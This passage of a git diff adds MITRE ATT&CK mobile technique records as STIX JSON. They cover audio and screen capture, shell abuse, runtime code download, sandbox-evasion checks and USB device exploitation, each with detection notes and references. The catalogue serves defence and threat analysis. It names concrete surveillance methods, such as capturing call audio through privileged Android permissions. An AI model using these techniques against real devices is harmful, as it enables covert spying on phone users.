Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include: \n \n* Exploiting insecure bootloaders in a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location.(Citation: IBM-NexusUSB) \n* Exploiting weakly-enforced security boundaries in Android devices such as the Google Pixel 2 over USB.(Citation: GoogleProjectZero-OATmeal) \n* Products from Cellebrite and Grayshift purportedly that can exploit some iOS devices using physical access to the data port to unlock the passcode.(Citation: 
Computerworld-iPhoneCracking) ", + "modified": "2022-04-08T15:53:11.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replication Through Removable Media", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + }, + { + "phase_name": "lateral-movement", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json new file mode 100644 index 0000000000000000000000000000000000000000..ed3cb707e607765a73f4ae984d966e1e94af778b --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760.json 
@@ -0,0 +1,79 @@ +{ + "type": "bundle", + "id": "bundle--589484b8-8d61-442e-bef7-fbb3a9311131", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T13:31:29.924Z", + "name": "Audio Capture", + "description": "Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information. \n\n \n\nAndroid and iOS, by default, require that applications request device microphone access from the user. \n\n \n\nOn Android devices, applications must hold the `RECORD_AUDIO` permission to access the microphone or the `CAPTURE_AUDIO_OUTPUT` permission to access audio output. Because Android does not allow third-party applications to hold the `CAPTURE_AUDIO_OUTPUT` permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the `CAPTURE_AUDIO_OUTPUT` permission, adversaries may pass the `MediaRecorder.AudioSource.VOICE_CALL` constant to `MediaRecorder.setAudioOutput`, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission) \n\n \n\nOn iOS devices, applications must include the `NSMicrophoneUsageDescription` key in their `Info.plist` file to access the microphone.(Citation: Requesting Auth-Media Capture)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. 
However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)\n\n\nIn Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators)\n \n\nAndroid applications using the `RECORD_AUDIO` permission and iOS applications using `RequestRecordPermission` should be carefully reviewed and monitored. If the `CAPTURE_AUDIO_OUTPUT` permission is found in a third-party Android application, the application should be heavily scrutinized. \n\n \n\nIn both Android (6.0 and up) and iOS, users can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "created": "2017-10-25T14:48:12.913Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1429", + "external_id": "T1429" + }, + { + "source_name": "Manifest.permission", + "description": "Android Developers. (2022, March 17). Voice Call. Retrieved April 1, 2022.", + "url": "https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL" + }, + { + "source_name": "Requesting Auth-Media Capture", + "description": "Apple Developers. (n.d.). Requesting Authorization for Media Capture on iOS. 
Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "Android Privacy Indicators", + "description": "Google. (n.d.). Privacy Indicators. Retrieved April 20, 2022.", + "url": "https://source.android.com/devices/tech/config/privacy-indicators" + }, + { + "source_name": "iOS Mic Spyware", + "description": "ZecOps Research Team. (2021, November 4). How iOS Malware Can Spy on Users Silently. Retrieved April 1, 2022.", + "url": "https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html", + "external_id": "APP-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json new file mode 100644 index 0000000000000000000000000000000000000000..44580816ed453e06854ca6e9e307fa60f9c8c5d7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--177e4394-2b22-4420-b6c4-d12df8c33dca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:59:46.686Z", + "name": "Hijack Execution Flow", + "description": "Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time. \n\nThere are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "created": "2022-03-30T14:49:18.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625", + "external_id": "T1625" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" 
+ ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json new file mode 100644 index 0000000000000000000000000000000000000000..a1bbc6c9a78a97a983ffd8b26a3e658a30efef14 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--6028e15a-f8c2-4b13-a016-6c55698fe8da", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:41:18.389Z", + "name": "Unix Shell", + "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken. \n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. \n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. \n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Command-line activities can potentially be detected through Mobile Threat Defense integrations with lower-level OS APIs. 
This could grant the MTD agents access to running processes and their parameters, potentially detecting unwanted or malicious shells.\n\nApplication vetting services could detect the invocations of methods that could be used to execute shell commands.(Citation: Samsung Knox Mobile Threat Defense)", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "created": "2022-03-30T13:59:50.479Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1623/001", + "external_id": "T1623.001" + }, + { + "source_name": "Samsung Knox Mobile Threat Defense", + "description": "Samsung Knox Partner Program. (n.d.). Knox for Mobile Threat Defense. Retrieved March 30, 2022.", + "url": "https://partner.samsungknox.com/mtd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json new file mode 100644 index 0000000000000000000000000000000000000000..76a1c545732a8399df90d771b9bd5e985e55cee2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--e4c9fa20-efc7-41f7-86d4-e44de9d2a27f", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6a3f6490-9c44-40de-b059-e5940f246673", + "created": "2017-10-25T14:48:33.158Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1437", + "url": "https://attack.mitre.org/techniques/T1437" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the mobile device, and often the results of those commands, will be embedded within the protocol traffic between the mobile device and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS.", + "modified": "2022-04-19T20:03:51.831Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Layer Protocol", + "x_mitre_detection": "Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. 
Enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json new file mode 100644 index 0000000000000000000000000000000000000000..aed6a960de2d71f0dfafecb46a576380a07fc80a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--95ef1e11-0287-42e1-9a3a-249793a11aef", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--6b846ad0-cc20-4db6-aa34-91561397c5e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:11.861Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1431", + "external_id": "T1431" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Web Download", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json new file mode 100644 index 0000000000000000000000000000000000000000..74b41b3cfa9e9258cf14f3b7853a871c20d395b5 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--353f142f-79a9-45cf-9324-359f0695a313", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:21:59.494Z", + "name": "Download New Code at Runtime", + "description": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView\u2019s `JavascriptInterface` capability. \n\nOn iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Existing network infrastructure may detect network calls to known malicious domains or the transfer of malicious payloads over the network. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities). Unfortunately, this is only a partial mitigation, as additional scrutiny would still need to be applied to applications that use these techniques. 
These techniques are often used without malicious intent, and applications may employ other techniques to hide their use of these techniques.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.4", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "created": "2017-10-25T14:48:14.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1407", + "external_id": "T1407" + }, + { + "source_name": "FireEye-JSPatch", + "description": "Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "external_id": "APP-20" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json new file mode 100644 index 0000000000000000000000000000000000000000..5430198ca80d6ed3286f3d0d2b95e2c43838d9f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--5f283ecd-9ed4-4c0c-a229-0f6eec016483", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--6f86d346-f092-4abc-80df-8558a90c426a", + "created": "2017-10-25T14:48:21.023Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1468", + "url": "https://attack.mitre.org/techniques/T1468" + }, + { + "source_name": "Krebs-Location", + "url": "https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/", + "description": "Brian Krebs. (2018, May 17). Tracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site. Retrieved November 8, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-5" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-7" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud services (e.g. 
Google's Android Device Manager or Apple iCloud's Find my iPhone) or to an enterprise mobility management (EMM) / mobile device management (MDM) server console could use that access to track mobile devices.(Citation: Krebs-Location)", + "modified": "2022-04-05T19:40:25.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remotely Track Device Without Authorization", + "x_mitre_detection": "Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json new file mode 100644 index 0000000000000000000000000000000000000000..2d1345b32a7054f6f8580559e94a8a4284e98be6 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--a0995a89-fd26-4ca5-a7ce-15ee2a7c1b24", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:51:04.432Z", + "name": "System Checks", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware\u2019s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nHardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for applications attempting to get `android.os.SystemProperties` or `getprop` with the runtime `exec()` commands. 
This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "created": "2022-03-30T17:53:35.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1633/001", + "external_id": "T1633.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json new file mode 100644 index 0000000000000000000000000000000000000000..39087793500c8c51a68a00bf8e24e18740bda641 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160.json 
@@ -0,0 +1,59 @@ +{ + "type": "bundle", + "id": "bundle--81a94fb4-b76e-427e-9650-dbd4e22ec565", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:53:16.029Z", + "name": "Stored Application Data", + "description": "Adversaries may try to access and collect application data resident on the device. Adversaries often target popular applications, such as Facebook, WeChat, and Gmail.(Citation: SWB Exodus March 2019) \n\n \n\nDue to mobile OS sandboxing, this technique is only possible in three scenarios: \n\n \n\n* An application stores files in unprotected external storage \n* An application stores files in its internal storage directory with insecure permissions (e.g. 777) \n* The adversary gains root permissions on the device ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "created": "2017-10-25T14:48:15.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1409", + "external_id": "T1409" + }, + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-0.html", + "external_id": "AUT-0" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json new file mode 100644 index 0000000000000000000000000000000000000000..6813852d9b23c2f1bde52a4723b6680c34946aa0 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e.json 
@@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--6b6d8958-c145-4ee1-b7b8-72e66fd69463", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-20T18:57:43.022Z", + "name": "Screen Capture", + "description": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "The user can view a list of apps with accessibility service privileges in the device settings. 
Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "created": "2019-08-08T18:34:14.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1513", + "external_id": "T1513" + }, + { + "source_name": "Android ScreenCap2 2019", + "description": "Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.", + "url": "https://developer.android.com/studio/command-line/adb" + }, + { + "source_name": "Android ScreenCap1 2019", + "description": "Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.", + "url": "https://developer.android.com/reference/android/media/projection/MediaProjectionManager" + }, + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + }, + { + "source_name": "Fortinet screencap July 2019", + "description": "Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.", + "url": "https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html" + }, + { + "source_name": "Trend Micro ScreenCap July 2015", + "description": "Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
